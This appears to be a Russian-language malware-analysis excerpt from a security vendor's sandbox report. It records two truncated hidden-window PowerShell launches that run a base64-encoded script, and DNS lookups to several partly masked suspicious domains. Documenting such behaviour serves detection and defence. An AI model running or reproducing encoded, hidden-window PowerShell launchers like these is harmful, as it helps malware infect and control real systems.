Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABlADgANgA0ADkANgBkADkAOQA2ADIAYgA2ADkAPQAnAGEAMAB4AGYAZQAwADMAMwA5ADQAMAAwADkAMAA2AGIANgBhAC...
- DNS ASK ra###eon.com
- DNS ASK of###xindia.com
- DNS ASK ah####aircenter.com
- DNS ASK bl###-man.com
- DNS ASK ag###atik.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABlADgANgA0ADkANgBkADkAOQA2ADIAYgA2ADkAPQAnAGEAMAB4AGYAZQAwADMAMwA5ADQAMAAwADkAMAA2AGIANgBhAC...' (со скрытым окном)